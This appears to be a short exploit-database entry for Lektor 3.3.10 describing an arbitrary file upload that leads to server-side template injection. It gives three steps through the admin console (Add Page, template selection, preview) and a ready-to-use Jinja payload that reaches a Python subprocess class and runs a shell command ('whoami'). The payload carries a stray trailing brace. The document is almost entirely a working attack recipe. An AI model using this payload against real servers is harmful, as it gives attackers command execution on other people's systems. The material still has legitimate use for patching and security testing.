# Exploit Title: Lektor static content management system Version: 3.3.10 Arbitrary File upload
# Date: 20/03/2024
# Exploit Author: kai6u
# Vendor Homepage: https://www.getlektor.com/
# Software Link: https://github.com/lektor/lektor/releases/tag/v3.3.10
# Version: 3.3.10
# Tested on: Ubuntu 22.04
1 ) Access to the administrator console via NW first creates a contetns.lr file containing the payload using Lektor's Add Page feature, specifying the templates directory.(Attacker also can upload to any directory.)
Payload:
{{ ''.__class__.__mro__[1].__subclasses__()[276]('whoami',shell=True,stdout=-1).communicate()[0].strip()}} }}
2 ) Create a new page by specifying the created contents.lr as template.
3 ) Use the preview function to check the sample page with the specified templates.